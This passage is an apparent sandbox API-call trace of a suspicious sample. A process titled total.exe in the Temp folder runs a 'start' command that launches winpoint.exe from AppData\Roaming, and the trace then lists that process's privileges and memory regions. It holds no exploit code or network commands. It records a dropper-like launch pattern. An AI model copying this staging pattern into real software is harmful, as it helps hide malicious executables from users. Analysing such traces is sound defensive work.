[0160.420] GetFullPathNameW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x22f7e0, lpFilePart=0x22f7dc | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFilePart=0x22f7dc*="Temp") returned 0x24 [0160.420] GetFileAttributesW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 0x2010 [0160.420] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f55c | out: lpFindFileData=0x22f55c) returned 0x3420b8 [0160.421] FindClose (in: hFindFile=0x3420b8 | out: hFindFile=0x3420b8) returned 1 [0160.421] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1", lpFindFileData=0x22f55c | out: lpFindFileData=0x22f55c) returned 0x3420b8 [0160.421] FindClose (in: hFindFile=0x3420b8 | out: hFindFile=0x3420b8) returned 1 [0160.421] _wcsnicmp (_String1="ADU0VK~1", _String2="ADU0VK~1", _MaxCount=0x8) returned 0 [0160.422] _wcsicmp (_String1="aDU0VK IWA5kLS", _String2="ADU0VK~1") returned -94 [0160.422] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData", lpFindFileData=0x22f55c | out: lpFindFileData=0x22f55c) returned 0x3420b8 [0160.422] FindClose (in: hFindFile=0x3420b8 | out: hFindFile=0x3420b8) returned 1 [0160.422] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local", lpFindFileData=0x22f55c | out: lpFindFileData=0x22f55c) returned 0x3420b8 [0160.422] FindClose (in: hFindFile=0x3420b8 | out: hFindFile=0x3420b8) returned 1 [0160.422] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFindFileData=0x22f55c | out: lpFindFileData=0x22f55c) returned 0x3420b8 [0160.422] FindClose (in: hFindFile=0x3420b8 | out: hFindFile=0x3420b8) returned 1 [0160.422] GetFileAttributesW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 0x2010 [0160.422] SetCurrentDirectoryW (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 1 [0160.422] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 1 [0160.422] GetEnvironmentStringsW () returned 0x342238* [0160.423] FreeEnvironmentStringsW (penv=0x342238) returned 1 [0160.423] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a945260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.423] GetConsoleOutputCP () returned 0x1b5 [0160.423] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a944260 | out: lpCPInfo=0x4a944260) returned 1 [0160.423] GetUserDefaultLCID () returned 0x409 [0160.423] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a944950, cchData=8 | out: lpLCData=":") returned 2 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f920, cchData=128 | out: lpLCData="0") returned 2 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f920, cchData=128 | out: lpLCData="0") returned 2 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f920, cchData=128 | out: lpLCData="1") returned 2 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a944940, cchData=8 | out: lpLCData="/") returned 2 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a944d80, cchData=32 | out: lpLCData="Mon") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a944d40, cchData=32 | out: lpLCData="Tue") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a944d00, cchData=32 | out: lpLCData="Wed") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a944cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a944c80, cchData=32 | out: lpLCData="Fri") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a944c40, cchData=32 | out: lpLCData="Sat") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a944c00, cchData=32 | out: lpLCData="Sun") returned 4 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a944930, cchData=8 | out: lpLCData=".") returned 2 [0160.424] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a944920, cchData=8 | out: lpLCData=",") returned 2 [0160.424] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0160.425] GetConsoleTitleW (in: lpConsoleTitle=0x330888, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 0x2e [0160.425] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75c90000 [0160.425] GetProcAddress (hModule=0x75c90000, lpProcName="CopyFileExW") returned 0x75cc3b92 [0160.425] GetProcAddress (hModule=0x75c90000, lpProcName="IsDebuggerPresent") returned 0x75ca4a5d [0160.425] GetProcAddress (hModule=0x75c90000, lpProcName="SetConsoleInputExeNameW") returned 0x75cba79d [0160.426] _wcsicmp (_String1="start", _String2=")") returned 74 [0160.426] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0160.426] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0160.426] _wcsicmp (_String1="IF", _String2="start") returned -10 [0160.426] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0160.426] _wcsicmp (_String1="REM", _String2="start") returned -1 [0160.426] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0160.427] GetConsoleTitleW (in: lpConsoleTitle=0x22f618, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 0x2e [0160.428] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0160.428] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0160.428] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0160.428] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0160.428] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0160.428] _wcsicmp (_String1="start", _String2="CD") returned 16 [0160.428] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0160.428] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0160.428] _wcsicmp (_String1="start", _String2="REN") returned 1 [0160.428] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0160.428] _wcsicmp (_String1="start", _String2="SET") returned 15 [0160.428] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0160.428] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0160.428] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0160.428] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0160.428] _wcsicmp (_String1="start", _String2="MD") returned 6 [0160.428] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0160.428] _wcsicmp (_String1="start", _String2="RD") returned 1 [0160.428] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0160.428] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0160.428] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0160.428] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0160.428] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0160.428] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0160.428] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0160.428] _wcsicmp (_String1="start", _String2="VER") returned -3 [0160.428] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0160.428] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0160.428] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0160.428] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0160.428] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0160.428] _wcsicmp (_String1="start", _String2="START") returned 0 [0160.431] GetStdHandle (nStdHandle=0xfffffff6) returned 0x198 [0160.431] GetStdHandle (nStdHandle=0xfffffff5) returned 0x1a0 [0160.431] GetStdHandle (nStdHandle=0xfffffff4) returned 0x1a0 [0160.431] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="DIR") returned -1 [0160.431] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="ERASE") returned -2 [0160.431] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="DEL") returned -1 [0160.431] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="TYPE") returned -17 [0160.431] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="COPY") returned -53 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="CD") returned -42 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="CHDIR") returned -46 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="RENAME") returned -15 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="REN") returned -15 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="ECHO") returned -2 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="SET") returned -16 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="PAUSE") returned -13 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="DATE") returned -1 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="TIME") returned -17 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="PROMPT") returned -13 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="MD") returned -10 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="MKDIR") returned -10 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="RD") returned -15 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="RMDIR") returned -15 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="PATH") returned -13 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="GOTO") returned -4 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="SHIFT") returned -16 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="CLS") returned -50 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="CALL") returned -39 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="VERIFY") returned -19 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="VER") returned -19 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="VOL") returned -19 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="EXIT") returned -2 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="SETLOCAL") returned -16 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="ENDLOCAL") returned -2 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="TITLE") returned -17 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="START") returned -16 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="DPATH") returned -1 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="KEYS") returned -8 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="MOVE") returned -10 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="PUSHD") returned -13 [0160.432] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="POPD") returned -13 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="ASSOC") returned 2 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="FTYPE") returned -3 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="BREAK") returned 1 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="COLOR") returned -53 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="MKLINK") returned -10 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="FOR") returned -3 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="IF") returned -6 [0160.433] _wcsicmp (_String1="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", _String2="REM") returned -15 [0160.433] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0160.433] SetErrorMode (uMode=0x0) returned 0x8001 [0160.433] SetErrorMode (uMode=0x1) returned 0x0 [0160.433] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\.", nBufferLength=0x208, lpBuffer=0x330c70, lpFilePart=0x212db0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming", lpFilePart=0x212db0*="Roaming") returned 0x27 [0160.433] SetErrorMode (uMode=0x8001) returned 0x1 [0160.433] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\.") returned 1 [0160.434] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a950640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0160.436] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.436] FindFirstFileExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", fInfoLevelId=0x1, lpFindFileData=0x212b4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x212b4c) returned 0x330e38 [0160.437] FindClose (in: hFindFile=0x330e38 | out: hFindFile=0x330e38) returned 1 [0160.437] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0160.437] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0160.437] GetStartupInfoW (in: lpStartupInfo=0x213064 | out: lpStartupInfo=0x213064*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x198, hStdOutput=0x1a0, hStdError=0x1a0)) [0160.437] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x213158 | out: lpAttributeList=0x0, lpSize=0x213158) returned 0 [0160.437] GetLastError () returned 0x7a [0160.437] InitializeProcThreadAttributeList (in: lpAttributeList=0x330e38, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x213158 | out: lpAttributeList=0x330e38, lpSize=0x213158) returned 1 [0160.437] UpdateProcThreadAttribute (in: lpAttributeList=0x330e38, dwFlags=0x0, Attribute=0x60001, lpValue=0x213130, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x330e38, lpPreviousValue=0x0) returned 1 [0160.437] CreateProcessW (in: lpApplicationName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe", lpCommandLine="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2130e8*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x198, hStdOutput=0x1a0, hStdError=0x1a0), lpProcessInformation=0x213140 | out: lpCommandLine="\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" ", lpProcessInformation=0x213140*(hProcess=0x78, hThread=0x74, dwProcessId=0x870, dwThreadId=0x650)) returned 1 [0160.440] DeleteProcThreadAttributeList (in: lpAttributeList=0x330e38 | out: lpAttributeList=0x330e38) [0160.440] GetLastError () returned 0x714 [0160.440] ResumeThread (hThread=0x74) returned 0x0 [0160.440] CloseHandle (hObject=0x74) returned 1 [0160.440] CloseHandle (hObject=0x78) returned 1 [0160.440] _get_osfhandle (_FileHandle=1) returned 0x1a0 [0160.440] SetConsoleMode (hConsoleHandle=0x1a0, dwMode=0x0) returned 0 [0160.440] _get_osfhandle (_FileHandle=1) returned 0x1a0 [0160.440] GetConsoleMode (in: hConsoleHandle=0x1a0, lpMode=0x4a9441ac | out: lpMode=0x4a9441ac) returned 0 [0160.440] _get_osfhandle (_FileHandle=0) returned 0x198 [0160.440] GetConsoleMode (in: hConsoleHandle=0x198, lpMode=0x4a9441b0 | out: lpMode=0x4a9441b0) returned 0 [0160.440] GetConsoleOutputCP () returned 0x1b5 [0160.441] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a944260 | out: lpCPInfo=0x4a944260) returned 1 [0160.441] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.441] exit (_Code=0) Process: id = "7" image_name = "winpoint.exe" filename = "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winpoint.exe" page_root = "0x19c4d000" os_pid = "0x870" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x890" cmd_line = "\"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\" " cur_dir = "C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1105 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1106 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1107 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1108 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1109 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1110 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1111 start_va = 0x400000 end_va = 0x4b9fff entry_point = 0x400000 region_type = mapped_file name = "winpoint.exe" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\roaming\\winpoint.exe") Region: id = 1112 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1113 start_va = 0x77d30000 end_va = 0x77eaffff entry_point = 0x77d30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1114 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1115 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1116 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1117 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1118 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1119 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1120 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1121 start_va = 0x300000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1122 start_va = 0x755d0000 end_va = 0x755d7fff entry_point = 0x755d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1123 start_va = 0x755e0000 end_va = 0x7563bfff entry_point = 0x755e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1124 start_va = 0x75640000 end_va = 0x7567efff entry_point = 0x75640000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1228 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1229 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1230 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1231 start_va = 0x620000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1232 start_va = 0x75280000 end_va = 0x75303fff entry_point = 0x75280000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1233 start_va = 0x75310000 end_va = 0x7539bfff entry_point = 0x75310000 region_type = mapped_file name = "odbc32.dll" filename = "\\Windows\\SysWOW64\\odbc32.dll" (normalized: "c:\\windows\\syswow64\\odbc32.dll") Region: id = 1234 start_va = 0x753a0000 end_va = 0x754befff entry_point = 0x753a0000 region_type = mapped_file name = "mfc42u.dll" filename = "\\Windows\\SysWOW64\\mfc42u.dll" (normalized: "c:\\windows\\syswow64\\mfc42u.dll") Region: id = 1235 start_va = 0x756d0000 end_va = 0x756e4fff entry_point = 0x756d0000 region_type = mapped_file name = "scarddlg.dll" filename = "\\Windows\\SysWOW64\\SCardDlg.dll" (normalized: "c:\\windows\\syswow64\\scarddlg.dll") Region: id = 1236 start_va = 0x75700000 end_va = 0x75722fff entry_point = 0x75700000 region_type = mapped_file name = "winscard.dll" filename = "\\Windows\\SysWOW64\\WinSCard.dll" (normalized: "c:\\windows\\syswow64\\winscard.dll") Region: id = 1237 start_va = 0x75880000 end_va = 0x7588bfff entry_point = 0x75880000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1238 start_va = 0x75890000 end_va = 0x758effff entry_point = 0x75890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1239 start_va = 0x75a10000 end_va = 0x75a55fff entry_point = 0x75a10000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1240 start_va = 0x75a60000 end_va = 0x75bbbfff entry_point = 0x75a60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1241 start_va = 0x75bc0000 end_va = 0x75c6bfff entry_point = 0x75bc0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1242 start_va = 0x75c70000 end_va = 0x75c81fff entry_point = 0x75c70000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1243 start_va = 0x75c90000 end_va = 0x75d9ffff entry_point = 0x75c90000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1244 start_va = 0x75f20000 end_va = 0x7600ffff entry_point = 0x75f20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1245 start_va = 0x76020000 end_va = 0x76046fff entry_point = 0x76020000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1246 start_va = 0x76130000 end_va = 0x762ccfff entry_point = 0x76130000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1247 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x76650000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1248 start_va = 0x76780000 end_va = 0x7687ffff entry_point = 0x76780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1249 start_va = 